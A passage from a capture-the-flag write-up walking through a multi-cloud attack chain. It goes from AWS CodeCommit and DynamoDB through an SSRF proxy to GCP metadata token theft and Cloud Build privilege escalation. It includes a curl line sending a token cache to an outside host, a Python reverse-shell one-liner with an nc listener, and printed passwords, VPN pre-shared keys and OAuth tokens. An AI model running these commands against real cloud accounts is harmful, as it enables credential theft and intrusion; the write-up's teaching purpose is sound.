Password for 'https://covid-developer-at-843869678166@git-codecommit.ap-southeast-1.amazonaws.com': TQyWYsSH+DTixfvF9DpuZsK4aybi5zeUYpCS1ZujxOE=
remote: Counting objects: 8, done.
Unpacking objects: 100% (8/8), done.

$ git clone https://git-codecommit.ap-southeast-1.amazonaws.com/v1/repos/punggol-digital-lock-api
Cloning into 'punggol-digital-lock-api'...
Username for 'https://git-codecommit.ap-southeast-1.amazonaws.com': covid-developer-at-843869678166
Password for 'https://covid-developer-at-843869678166@git-codecommit.ap-southeast-1.amazonaws.com': TQyWYsSH+DTixfvF9DpuZsK4aybi5zeUYpCS1ZujxOE=
remote: Counting objects: 7, done.
Unpacking objects: 100% (7/7), done.

Awesome! We now have both code repositories.

At this point, the punggol-digital-lock-api repository definitely sounds more interesting since we know that punggol-digital-lock-cors-server is likely to be the cors-anywhere proxy application, so let’s look at the punggol-digital-lock-api repository first.

Getting to the Database

In the punggol-digital-lock-api repository, there is a Node.js application.

The source code of index.js is shown below:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
var express = require('express')
var app = express()
var cors = require('cors');
var AWS = require("aws-sdk");
var corsOptions = {
    origin: 'http://punggol-digital-lock.internal',
    optionsSuccessStatus: 200 // some legacy browsers (IE11, various SmartTVs) choke on 204
}
AWS.config.loadFromPath('./node_config.json');
var ddb = new AWS.DynamoDB({ apiVersion: '2012-08-10' });
let dataStore = [];

const download_data = () => {
    return new Promise((resolve, reject) => {
        try {
            var params = {
                ExpressionAttributeValues: {
                    ':id': { N: '101' }
                },
                FilterExpression: 'id < :id',
                TableName: 'citizens'
            };
            ddb.scan(params, function (err, data) {
                if (err) {
                    console.log("Error", err);
                    return reject(null);
                } else {
                    results = []
                    data.Items.forEach(function (element, index, array) {
                        results.push({
                            'no_of_files': element.no_of_files.N,
                            'cash_bounty': element.cash_bounty.N,
                            'id': element.id.N,
                            'name': element.name.S,
                            'total_file_size': element.total_file_size.N
                        });
                    });
                    return resolve(results);
                }
            });
        } catch (err) {
            console.error(err);
        }
    });

}

async function boostrap() {
    dataStore = await download_data();
}

boostrap();

app.get('/dump-data', cors(corsOptions), function (req, res, next) {
    res.json({ data: dataStore });
})
app.listen(8080, function () {
    console.log('punggol-digital-lock-api server running on port 8080')
})

We can observe that there is an internal hostname punggol-digital-lock.internal and that the application fetches the list of victim users from an Amazon DynamoDB NoSQL database. Taking a closer look at the code, we can also see that the table name is citizens and that the code executes ddb.scan() to fetch records with id < 101.

Scanning the Flag from DynamoDB

Let’s try to enumerate the Amazon DynamoDB NoSQL database further.

$ aws dynamodb list-tables
{
    "TableNames": [
        "citizens"
    ]
}

Looks like there’s only one table citizens in the DynamoDB. Let’s try to query it and fetch all records except id = 0:

$ aws dynamodb query --table-name "citizens" --key-condition-expression 'id > :id' --expression-attribute-values '{":id":{"N":"0"}}'

An error occurred (AccessDeniedException) when calling the Query operation: User: arn:aws:sts::843869678166:assumed-role/punggol-digital-lock-service/i-0da9e688ab9264a5e is not authorized to perform: dynamodb:Query on resource: arn:aws:dynamodb:ap-southeast-1:843869678166:table/citizens

Unfortunately, we don’t have the permission to do so. Instead of performing the query operation, let’s try using the scan operation to dump the table contents instead:

$ aws dynamodb scan --table-name citizens | wc -l
1724

That worked! That’s quite a bit of data to sieve through, so let’s grep for the flag in the JSON output:

$ aws dynamodb scan --table-name citizens | grep -A 5 -B 11 govtech
{
    "no_of_files": {
        "N": "0"
    },
    "cash_bounty": {
        "N": "0"
    },
    "id": {
        "N": "10000"
    },
    "name": {
        "S": "govtech-csg{Mult1_Cl0uD_"
    },
    "total_file_size": {
        "N": "0"
    }
},

And we successfully get the first half of the flag: govtech-csg{Mult1_Cl0uD_ :smile:
Before we continue to find the second half of the flag, let’s take a quick look at our progress at the moment:

Midpoint of Attack Path

VPN Subnet Routing

Now what? We still have not looked at the punggol-digital-lock-cors-server code repository yet.

As expected, there is an Node.js application basically creating a cors-anywhere proxy at index.js:

1
2
3
4
5
6
7
8
9
10
11
12
// Listen on a specific host via the HOST environment variable
var host = '0.0.0.0';
// Listen on a specific port via the PORT environment variable
var port = 80;
var cors_proxy = require('cors-anywhere');
cors_proxy.createServer({
    originWhitelist: [], // Allow all origins
    setHeaders: {'x-requested-with': 'cors-server'},
    removeHeaders: ['cookie']
}).listen(port, host, function() {
    console.log('cors-server running on ' + host + ':' + port);
});

More importantly, there’s a note.txt:

Allow requests to be proxied to reach internal networks. Current network has routing enabled to the other VPN subnets.

That’s interesting. If the current network has routing to the other VPN subnets, perhaps we can access hosts on the other network too!
Which reminds me, we haven’t checked out the output for the permitted actions – ec2.DescribeRouteTables and ec2.DescribeVpnConnections – just yet, so let’s do that now:

$ aws ec2 describe-vpn-connections
{
    "VpnConnections": [
        {
            "CustomerGatewayConfiguration": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<vpn_connection id=\"vpn-071d320b1122f4c0e\">\n  <customer_gateway_id>cgw-025dc69154fd5cf91</customer_gateway_id>\n  <vpn_gateway_id>vgw-03a9749df3e682e4b</vpn_gateway_id>\n  <vpn_connection_type>ipsec.1</vpn_connection_type>\n  <ipsec_tunnel>\n    <customer_gateway>\n      <tunnel_outside_address>\n        <ip_address>34.87.151.253</ip_address>\n      </tunnel_outside_address>\n      <tunnel_inside_address>\n        <ip_address>169.254.9.118</ip_address>\n        <network_mask>255.255.255.252</network_mask>\n        <network_cidr>30</network_cidr>\n      </tunnel_inside_address>\n      <bgp>\n        <asn>65000</asn>\n        <hold_time>30</hold_time>\n      </bgp>\n    </customer_gateway>\n    <vpn_gateway>\n      <tunnel_outside_address>\n        <ip_address>54.254.23.247</ip_address>\n      </tunnel_outside_address>\n      <tunnel_inside_address>\n        <ip_address>169.254.9.117</ip_address>\n        <network_mask>255.255.255.252</network_mask>\n        <network_cidr>30</network_cidr>\n      </tunnel_inside_address>\n      <bgp>\n        <asn>64512</asn>\n        <hold_time>30</hold_time>\n      </bgp>\n    </vpn_gateway>\n    <ike>\n      <authentication_protocol>sha1</authentication_protocol>\n      <encryption_protocol>aes-128-cbc</encryption_protocol>\n      <lifetime>28800</lifetime>\n      <perfect_forward_secrecy>group2</perfect_forward_secrecy>\n      <mode>main</mode>\n      <pre_shared_key>lROuGqp0zYsQ5PjyJNHlKTFQPz0apIn4</pre_shared_key>\n    </ike>\n    <ipsec>\n      <protocol>esp</protocol>\n      <authentication_protocol>hmac-sha1-96</authentication_protocol>\n      <encryption_protocol>aes-128-cbc</encryption_protocol>\n      <lifetime>3600</lifetime>\n      <perfect_forward_secrecy>group2</perfect_forward_secrecy>\n      <mode>tunnel</mode>\n      <clear_df_bit>true</clear_df_bit>\n      <fragmentation_before_encryption>true</fragmentation_before_encryption>\n      <tcp_mss_adjustment>1379</tcp_mss_adjustment>\n      <dead_peer_detection>\n        <interval>10</interval>\n        <retries>3</retries>\n      </dead_peer_detection>\n    </ipsec>\n  </ipsec_tunnel>\n  <ipsec_tunnel>\n    <customer_gateway>\n      <tunnel_outside_address>\n        <ip_address>34.87.151.253</ip_address>\n      </tunnel_outside_address>\n      <tunnel_inside_address>\n        <ip_address>169.254.242.238</ip_address>\n        <network_mask>255.255.255.252</network_mask>\n        <network_cidr>30</network_cidr>\n      </tunnel_inside_address>\n      <bgp>\n        <asn>65000</asn>\n        <hold_time>30</hold_time>\n      </bgp>\n    </customer_gateway>\n    <vpn_gateway>\n      <tunnel_outside_address>\n        <ip_address>54.254.251.166</ip_address>\n      </tunnel_outside_address>\n      <tunnel_inside_address>\n        <ip_address>169.254.242.237</ip_address>\n        <network_mask>255.255.255.252</network_mask>\n        <network_cidr>30</network_cidr>\n      </tunnel_inside_address>\n      <bgp>\n        <asn>64512</asn>\n        <hold_time>30</hold_time>\n      </bgp>\n    </vpn_gateway>\n    <ike>\n      <authentication_protocol>sha1</authentication_protocol>\n      <encryption_protocol>aes-128-cbc</encryption_protocol>\n      <lifetime>28800</lifetime>\n      <perfect_forward_secrecy>group2</perfect_forward_secrecy>\n      <mode>main</mode>\n      <pre_shared_key>.BFZUutUl7Y3jA91vU9K6te5y_Q_VM7f</pre_shared_key>\n    </ike>\n    <ipsec>\n      <protocol>esp</protocol>\n      <authentication_protocol>hmac-sha1-96</authentication_protocol>\n      <encryption_protocol>aes-128-cbc</encryption_protocol>\n      <lifetime>3600</lifetime>\n      <perfect_forward_secrecy>group2</perfect_forward_secrecy>\n      <mode>tunnel</mode>\n      <clear_df_bit>true</clear_df_bit>\n      <fragmentation_before_encryption>true</fragmentation_before_encryption>\n      <tcp_mss_adjustment>1379</tcp_mss_adjustment>\n      <dead_peer_detection>\n        <interval>10</interval>\n        <retries>3</retries>\n      </dead_peer_detection>\n    </ipsec>\n  </ipsec_tunnel>\n</vpn_connection>",
            "CustomerGatewayId": "cgw-025dc69154fd5cf91",
            "Category": "VPN",
            "State": "available",
            "Type": "ipsec.1",
            "VpnConnectionId": "vpn-071d320b1122f4c0e",
            "VpnGatewayId": "vgw-03a9749df3e682e4b",
            "Options": {
                "EnableAcceleration": false,
                "StaticRoutesOnly": false,
                "LocalIpv4NetworkCidr": "0.0.0.0/0",
                "RemoteIpv4NetworkCidr": "0.0.0.0/0",
                "TunnelInsideIpVersion": "ipv4"
            },
            "Routes": [],
            "Tags": [
                {
                    "Key": "Name",
                    "Value": "aws-vpn-connection1"
                }
            ],
            "VgwTelemetry": [
                {
                    "AcceptedRouteCount": 1,
                    "LastStatusChange": "2020-12-09T13:21:11.000Z",
                    "OutsideIpAddress": "54.254.23.247",
                    "Status": "UP",
                    "StatusMessage": "1 BGP ROUTES"
                },
                {
                    "AcceptedRouteCount": 1,
                    "LastStatusChange": "2020-12-09T16:20:56.000Z",
                    "OutsideIpAddress": "54.254.251.166",
                    "Status": "UP",
                    "StatusMessage": "1 BGP ROUTES"
                }
            ]
        }
    ]
}

Whoa! That’s a lot of information.

Essentially, the Amazon EC2 instance has a Site-to-site IPSec VPN tunnel between 54.254.23.247 (Amazon) and 34.87.151.253 (Google Cloud). This creates a persistent connection between the two Virtual Private Cloud (VPC) networks, allowing accessing of network resources in a Google Cloud VPC network from an Amazon VPC network and vice versa.

Let’s also view the network routes configured for the Amazon VPC:

$ aws ec2 describe-route-tables
{
    "RouteTables": [
        {
            "Associations": [
                {
                    "Main": true,
                    "RouteTableAssociationId": "rtbassoc-f9acc780",
                    "RouteTableId": "rtb-f8d8a19e",
                    "AssociationState": {
                        "State": "associated"
                    }
                }
            ],
            "PropagatingVgws": [],
            "RouteTableId": "rtb-f8d8a19e",
            "Routes": [
                {
                    "DestinationCidrBlock": "172.31.0.0/16",
                    "GatewayId": "local",
                    "Origin": "CreateRouteTable",
                    "State": "active"
                },
                {
                    "DestinationCidrBlock": "0.0.0.0/0",
                    "GatewayId": "igw-e15b4f85",
                    "Origin": "CreateRoute",
                    "State": "active"
                }
            ],
            "Tags": [],
            "VpcId": "vpc-66699c00",
            "OwnerId": "843869678166"
        },
        {
            "Associations": [
                {
                    "Main": true,
                    "RouteTableAssociationId": "rtbassoc-04c8bf104c051f5a3",
                    "RouteTableId": "rtb-0723142a5801fe538",
                    "AssociationState": {
                        "State": "associated"
                    }
                }
            ],
            "PropagatingVgws": [
                {
                    "GatewayId": "vgw-03a9749df3e682e4b"
                }
            ],
            "RouteTableId": "rtb-0723142a5801fe538",
            "Routes": [
                {
                    "DestinationCidrBlock": "172.16.0.0/16",
                    "GatewayId": "local",
                    "Origin": "CreateRouteTable",
                    "State": "active"
                },
                {
                    "DestinationCidrBlock": "0.0.0.0/0",
                    "GatewayId": "igw-0ce84b9afa6a16a08",
                    "Origin": "CreateRoute",
                    "State": "active"
                },
                {
                    "DestinationCidrBlock": "10.240.0.0/24",
                    "GatewayId": "vgw-03a9749df3e682e4b",
                    "Origin": "EnableVgwRoutePropagation",
                    "State": "active"
                }
            ],
            "Tags": [],
            "VpcId": "vpc-09e10b8144ebddec2",
            "OwnerId": "843869678166"
        }
    ]
}

Notice that the subnet 10.240.0.0/24 is allocated for gateway ID vgw-03a9749df3e682e4b, which is also the VpnGatewayId found in the VPN connection details. Since the two networks are connected together by the VPN tunnel, we can try to connect to hosts in the VPN network.

To do so, we can leverage the SSRF in the punggol-digital-lock-cors-server application and brute-force against the 10.240.0.0/24 subnet to identify hosts that are alive on the network.

Note: Valid hosts in the 10.240.0.0/24 ranges from 10.240.0.1 to 10.240.0.254, so we only need to bruteforce 254 network hosts.

If a network host is unreachable via SSRF, the response will be extremely delayed. Hence, we can set a timeout of 1 second when performing our brute-force to reduce the scanning time needed.

I used ffuf to fuzz the last octet of the IP address:

$ seq 1 254 > octet
$ ffuf -u http://122.248.230.66/http://10.240.0.FUZZ/ -w octet -timeout 1

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.2.0-git
________________________________________________

 :: Method           : GET
 :: URL              : http://122.248.230.66/http://10.240.0.FUZZ:8080/
 :: Wordlist         : FUZZ: octet
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 1
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403
________________________________________________

100                     [Status: 200, Size: 364, Words: 105, Lines: 13]
:: Progress: [254/254] :: Job [1/1] :: 18 req/sec :: Duration: [0:00:14] :: Errors: 253 ::

We found an alive network host 10.240.0.100!

Now, we can also enumerate all TCP ports and try to discover any HTTP/HTTPS services that we can interact with:

$ seq 1 65535 > ports
$ ffuf -u http://122.248.230.66/http://10.240.0.100:FUZZ/ -w ports -timeout 1

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.2.0-git
________________________________________________

 :: Method           : GET
 :: URL              : http://122.248.230.66/http://10.240.0.100:FUZZ/
 :: Wordlist         : FUZZ: ports
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 1
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403
________________________________________________

80                      [Status: 200, Size: 364, Words: 105, Lines: 13]
:: Progress: [65535/65535] :: Job [1/1] :: 5041 req/sec :: Duration: [0:00:13] :: Errors: 0 ::

Doh! There’s a HTTP webserver running on port 80 on the host all along!

Exploiting SSRF-as-a-Service (“SaaS”) Application

Internal Web Proxy

Great! We discovered yet another proxy application.

Even if we did not realise that this network host is actually within a Google VPC from earlier, we can still realise that pretty quickly in this next step.

Using the proxy, we try to enter http://localhost for the site and see if the response for http://localhost returns the Internal Web Proxy:

$ curl http://122.248.230.66/http://10.240.0.100/index.php?site=http://localhost
<html>
    <head> </head>
    <body> 
        <h4>Internal Web Proxy</h4>
        <p>No more lock down! - by COViD devops team<p>
        <form action="/index.php" method="get">
            <label for="site">Site:</label>
            <input type="text" id="site" name="site">
            <input type="submit" value="Visit">
        </form>
    Failed to parse address "localhost" (error number 0) 
    </body>
</html>

Seems like there’s some parsing errors in the URL supplied. Maybe it requires a port number to be explicitly specified?

$ curl http://122.248.230.66/http://10.240.0.100/index.php?site=http://localhost:80
<html>
    <head> </head>
    <body> 
        <h4>Internal Web Proxy</h4>
        <p>No more lock down! - by COViD devops team<p>
        <form action="/index.php" method="get">
            <label for="site">Site:</label>
            <input type="text" id="site" name="site">
            <input type="submit" value="Visit">
        </form>
    <br><hr><br>HTTP/1.1 400 Bad Request
Date: Thu, 10 Dec 2020 05:53:14 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 366
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
<hr>
<address>Apache/2.4.18 (Ubuntu) Server at gcp-vm-asia-southeast1.asia-southeast1-a.c.stack-the-flags-296309.internal Port 80</address>
</body></html>
    </body>
</html>

Interestingly, we got a 404 Bad Request error, leaking the internal hostname of a instance hosted using GCP Compute Engine (inferred from the gcp-* hostname). If we fix the request by adding a trailing slash to the URL http://122.248.230.66/http://10.240.0.100/index.php?site=http://localhost:80, we can use the Internal Web Proxy application to fetch itself:

Internal Web Proxy

Now, we have a working SSRF within the Google VPC network assigned to the GCP Compute Engine instance! :smile:

Can you smell the flag yet? We are so close to the flag now…
Let’s pause for a minute to see where we are at now:
Attack Path Reaching GCP

Metadata FTW

What’s next? Well, we can enumerate the GCP instance metadata server to get temporary service account credentials.

$ curl http://122.248.230.66/http://10.240.0.100/index.php?site=http://169.254.169.254:80/computeMetadata/v1beta1/instance/
...
HTTP/1.1 200 OK
Metadata-Flavor: Google
Content-Type: application/text
ETag: 2f6048afc5ce2feb
Date: Thu, 10 Dec 2020 06:16:09 GMT
Server: Metadata Server for VM
Connection: Close
Content-Length: 183
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

attributes/
description
disks/
guest-attributes/
hostname
id
image
licenses/
machine-type
maintenance-event
name
network-interfaces/
preempted
scheduling/
service-accounts/
tags
zone

We see that the depreciated v1beta1 metadata endpoint is still enabled, which is great news for us because that way, we don’t have to set the Metadata-Flavor: Google HTTP header in our requests. There doesn’t appear to be a way to make the Internal Web Proxy application set a custom HTTP header for us, so we won’t be able to fetch metadata from the v1 metadata endpoint via SSRF:

$ curl http://122.248.230.66/http://10.240.0.100/index.php?site=http://169.254.169.254:80/computeMetadata/v1/
...
HTTP/1.1 403 Forbidden
Metadata-Flavor: Google
Date: Thu, 10 Dec 2020 06:40:48 GMT
Content-Type: text/html; charset=UTF-8
Server: Metadata Server for VM
Connection: Close
Content-Length: 1636
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
...
$ curl http://122.248.230.66/http://10.240.0.100/index.php?site=http://169.254.169.254:80/computeMetadata/v1beta1/instance/service-accounts/
...
covid-devops@stack-the-flags-296309.iam.gserviceaccount.com/
default/
...

$ curl http://122.248.230.66/http://10.240.0.100/index.php?site=http://169.254.169.254:80/computeMetadata/v1beta1/instance/service-accounts/covid-devops@stack-the-flags-296309.iam.gserviceaccount.com/aliases
...
default
...

$ curl http://122.248.230.66/http://10.240.0.100/index.php?site=http://169.254.169.254:80/computeMetadata/v1beta1/instance/service-accounts/covid-devops@stack-the-flags-296309.iam.gserviceaccount.com/scopes
...
https://www.googleapis.com/auth/cloud-platform
...

$ curl http://122.248.230.66/http://10.240.0.100/index.php?site=http://169.254.169.254:80/computeMetadata/v1beta1/instance/service-accounts/covid-devops@stack-the-flags-296309.iam.gserviceaccount.com/token
...
{"access_token":"ya29.c.Ko0B6AcqN41ISFTTWIiitNsHfjiOeeKUDpQfzuV8pA1Fo6PC1PkjRO_OkjQBXQFcGIAWY-4d03toeSJX9KU-Nwq1W9z31H8psU61-dADX3EzP447Pq5twnpsp144R3IKmriDOdGGtmFRj2IX8oOWacHwyT17lV9t8wne7xjHz_uKK7qSPcTUVo8dkZ4gcPnU","expires_in":3395,"token_type":"Bearer"}
...

Here, we can see a service account covid-devops@stack-the-flags-296309.iam.gserviceaccount.com assumes the covid-devops role. The scope of the service account is cloud-platform, which looks really promising. Lastly, we also managed to fetch the OAuth token associated with the service account, allowing us to authenticate and perform actions on behalf of the service account.

We will probably also need the project ID so let’s grab that from the metadata server:

$ curl http://122.248.230.66/http://10.240.0.100/index.php?site=http://169.254.169.254:80/computeMetadata/v1beta1/project/project-id
...

stack-the-flags-296309
...

Enumerating Google Cloud APIs

Looking at the list of Google Cloud APIs available, we see that there are many APIs available for us to use. Note that not all APIs are enabled or accessible by the service account, so we really should start by figuring out what is accessible to us.

Using the GCP’s Identity and Access Management (IAM) API, let’s try to list all roles in the stack-the-flags-296309 project:

$ curl https://iam.googleapis.com/v1/projects/stack-the-flags-296309/roles/?access_token=ya29.c.Ko0B6AcqN41ISFTTWIiitNsHfjiOeeKUDpQfzuV8pA1Fo6PC1PkjRO_OkjQBXQFcGIAWY-4d03toeSJX9KU-Nwq1W9z31H8psU61-dADX3EzP447Pq5twnpsp144R3IKmriDOdGGtmFRj2IX8oOWacHwyT17lV9t8wne7xjHz_uKK7qSPcTUVo8dkZ4gcPnU
{
  "roles": [
    {
      "name": "projects/stack-the-flags-296309/roles/covid_devops",
      "title": "covid-devops",
      "description": "Created on: 2020-11-22",
      "etag": "BwW0oxMMCDU="
    }
  ]
}

That worked! Seems like there’s only the covid_devops role. Let’s try to view the permissions included for the role:

$ curl https://iam.googleapis.com/v1/projects/stack-the-flags-296309/roles/covid_devops?access_token=ya29.c.Ko0B6AcqN41ISFTTWIiitNsHfjiOeeKUDpQfzuV8pA1Fo6PC1PkjRO_OkjQBXQFcGIAWY-4d03toeSJX9KU-Nwq1W9z31H8psU61-dADX3EzP447Pq5twnpsp144R3IKmriDOdGGtmFRj2IX8oOWacHwyT17lV9t8wne7xjHz_uKK7qSPcTUVo8dkZ4gcPnU
{
  "name": "projects/stack-the-flags-296309/roles/covid_devops",
  "title": "covid-devops",
  "description": "Created on: 2020-11-22",
  "includedPermissions": [
    "cloudbuild.builds.create",
    "compute.instances.get",
    "compute.projects.get",
    "iam.roles.get",
    "iam.roles.list",
    "storage.buckets.create",
    "storage.buckets.get",
    "storage.buckets.list",
    "storage.objects.create"
  ],
  "etag": "BwW0oxMMCDU="
}

We observe a few interesting permissions for the covid_devops role. Since we are looking for the flag, perhaps the flag is stored as an object in a GCP Cloud Storage bucket. However, note that we only have the following permissions relating to GCP Cloud Storage:

  • storage.buckets.create
  • storage.buckets.get
  • storage.buckets.list
  • storage.objects.create

Without storage.objects.get permission, we may be unable to read objects stored in the bucket. Nonetheless, let’s proceed on to enumerate the list of buckets using GCP’s Cloud Storage API:

$ curl https://storage.googleapis.com/storage/v1/b?project=stack-the-flags-296309&access_token=ya29.c.Ko0B6AcqN41ISFTTWIiitNsHfjiOeeKUDpQfzuV8pA1Fo6PC1PkjRO_OkjQBXQFcGIAWY-4d03toeSJX9KU-Nwq1W9z31H8psU61-dADX3EzP447Pq5twnpsp144R3IKmriDOdGGtmFRj2IX8oOWacHwyT17lV9t8wne7xjHz_uKK7qSPcTUVo8dkZ4gcPnU
{
  "kind": "storage#buckets",
  "items": [
    {
      "kind": "storage#bucket",
      "selfLink": "https://www.googleapis.com/storage/v1/b/punggol-digital-lock-key",
      "id": "punggol-digital-lock-key",
      "name": "punggol-digital-lock-key",
      "projectNumber": "605021491171",
      "metageneration": "3",
      "location": "ASIA-SOUTHEAST1",
      "storageClass": "STANDARD",
      "etag": "CAM=",
      "defaultEventBasedHold": false,
      "timeCreated": "2020-11-21T20:14:44.705Z",
      "updated": "2020-11-22T07:53:37.521Z",
      "iamConfiguration": {
        "bucketPolicyOnly": {
          "enabled": true,
          "lockedTime": "2021-02-20T07:53:37.511Z"
        },
        "uniformBucketLevelAccess": {
          "enabled": true,
          "lockedTime": "2021-02-20T07:53:37.511Z"
        }
      },
      "locationType": "region",
      "satisfiesPZS": false
    }
  ]
}

We see that there’s a bucket named punggol-digital-lock-key. Perhaps we need to escalate our privileges to another user with storage.objects.get permissions. Reviewing the privileges of the covid_devops role, we see that there is cloudbuild.builds.create IAM permission.

Road to Impersonating the Cloud Build Service Account

Rhino Security Labs wrote an article on a privilege escalation attack using the cloudbuild.builds.create permission, allowing us to obtain the temporary credentials for the GCP’s Cloud Build service account, which may have greater privileges than our current covid_devops assumed role user.

Rhino Security Labs also created a public GitHub repository for IAM Privilege Escalation in GCP containing the exploit script for escalating privileges via cloudbuild.builds.create permission.

Before we continue, do install the googleapiclient dependency using:

$ pip3 install google-api-python-client --user

Then, grab the exploit script and run it.
In this example, the listening host is 3.1.33.7 and the listening port is 31337:

$ git clone https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation
$ cd GCP-IAM-Privilege-Escalation/ExploitScripts/
$ python3 cloudbuild.builds.create.py -p stack-the-flags-296309 -i 3.1.33.7:31337
No credential file passed in, enter an access token to authenticate? (y/n) y
Enter an access token to use for authentication: ya29.c.Ko0B6AcqN41ISFTTWIiitNsHfjiOeeKUDpQfzuV8pA1Fo6PC1PkjRO_OkjQBXQFcGIAWY-4d03toeSJX9KU-Nwq1W9z31H8psU61-dADX3EzP447Pq5twnpsp144R3IKmriDOdGGtmFRj2IX8oOWacHwyT17lV9t8wne7xjHz_uKK7qSPcTUVo8dkZ4gcPnU
{
    "name": "operations/build/stack-the-flags-296309/YTkzZTZmYTMtOWFmOC00YWFjLTg4NTYtNzRlZjlkNGExZGQw",
    "metadata": {
        "@type": "type.googleapis.com/google.devtools.cloudbuild.v1.BuildOperationMetadata",
        "build": {
            "id": "a93e6fa3-9af8-4aac-8856-74ef9d4a1dd0",
            "status": "QUEUED",
            "createTime": "2020-12-10T07:15:13.788132684Z",
            "steps": [
                {
                    "name": "python",
                    "args": [
                        "-c",
                        "import os;os.system(\"curl -d @/root/tokencache/gsutil_token_cache 3.1.33.7:31337\")"
                    ],
                    "entrypoint": "python"
                }
            ],
            "timeout": "600s",
            "projectId": "stack-the-flags-296309",
            "logsBucket": "gs://605021491171.cloudbuild-logs.googleusercontent.com",
            "options": {
                "logging": "LEGACY"
            },
            "logUrl": "https://console.cloud.google.com/cloud-build/builds/a93e6fa3-9af8-4aac-8856-74ef9d4a1dd0?project=605021491171",
            "queueTtl": "3600s",
            "name": "projects/605021491171/locations/global/builds/a93e6fa3-9af8-4aac-8856-74ef9d4a1dd0"
        }
    }
}
Web server started at 0.0.0.0:31337.
Waiting for token at 3.1.33.7:31337...

$ 

Strange! The access token for the GCP Cloud Build service account is not returned to us!
Perhaps something went wrong. Let’s modify the script to get a reverse shell and investigate further:

Add this line and update the host/port just before the build_body dict:

command = f'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{args.ip_port.split(":")[0]}",{args.ip_port.split(":")[1]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

And, replace these lines:

handler = socketserver.TCPServer(('', int(port)),myHandler)
print(f'Web server started at 0.0.0.0:{port}.')
print(f'Waiting for token at {ip}:{port}...\n')
handler.handle_request()

With these:

print(f'Waiting for reverse shell at {ip}:{port}...\n')
import os; os.system(f"nc -lnvp {port}")

Then, re-run the application again:

$ sudo python3 cloudbuild.builds.create.py -p stack-the-flags-296309 -i 3.1.33.7:31337
No credential file passed in, enter an access token to authenticate? (y/n) y
Enter an access token to use for authentication: ya29.c.Ko0B6AcqN41ISFTTWIiitNsHfjiOeeKUDpQfzuV8pA1Fo6PC1PkjRO_OkjQBXQFcGIAWY-4d03toeSJX9KU-Nwq1W9z31H8psU61-dADX3EzP447Pq5twnpsp144R3IKmriDOdGGtmFRj2IX8oOWacHwyT17lV9t8wne7xjHz_uKK7qSPcTUVo8dkZ4gcPnU
{
    "name": "operations/build/stack-the-flags-296309/MTEzMjBmN2QtNjMzOS00OTMxLTk5NWMtM2ZiZWRkYTNmYWFl",
    "metadata": {
        "@type": "type.googleapis.com/google.devtools.cloudbuild.v1.BuildOperationMetadata",
        "build": {
            "id": "11320f7d-6339-4931-995c-3fbedda3faae",
            "status": "QUEUED",
            "createTime": "2020-12-10T07:15:14.173481293Z",
            "steps": [
                {
                    "name": "python",
                    "args": [
                        "-c",
                        "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"3.1.33.7\",31337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")"
                    ],
                    "entrypoint": "python"
                }
            ],
            "timeout": "600s",
            "projectId": "stack-the-flags-296309",
            "logsBucket": "gs://605021491171.cloudbuild-logs.googleusercontent.com",
            "options": {
                "logging": "LEGACY"
            },
            "logUrl": "https://console.cloud.google.com/cloud-build/builds/11320f7d-6339-4931-995c-3fbedda3faae?project=605021491171",
            "queueTtl": "3600s",
            "name": "projects/605021491171/locations/global/builds/11320f7d-6339-4931-995c-3fbedda3faae"
        }
    }
}
Waiting for reverse shell at 3.1.33.7:31337...

Listening on [0.0.0.0] (family 0, port 8080)
Connection from 34.73.245.117 52068 received!
root@aecc318d6dc4:/workspace#

Hooray! We get a root shell! But remember, our goal is not to achieve root on a Cloud Build container, so let’s continue on to get the access token for the Cloud Build service account.

root@aecc318d6dc4:/workspace# cat /root/tokencache/gsutil_token_cache
cat /root/tokencache/gsutil_token_cache
cat: /root/tokencache/gsutil_token_cache: No such file or directory

Oh no. The exploit script failed because the access token cached for use by gsutil is missing!

There are two ways to get the access token from this point on:

  1. Method 1: Query the Metadata Server directly
  2. Method 2: Install gsutil and make it fetch the access token for you

Method 1: Via GCP Instance Metadata Server

root@79e8f1cff449:/workspace# curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/?recursive=true
{
    "605021491171@cloudbuild.gserviceaccount.com": {
        "aliases": ["default"],
        "email": "605021491171@cloudbuild.gserviceaccount.com",
        "scopes": ["https://www.googleapis.com/auth/cloud-platform", "https://www.googleapis.com/auth/cloud-source-tools", "https://www.googleapis.com/auth/userinfo.email"]
    },
    "default": {
        "aliases": ["default"],
        "email": "605021491171@cloudbuild.gserviceaccount.com",
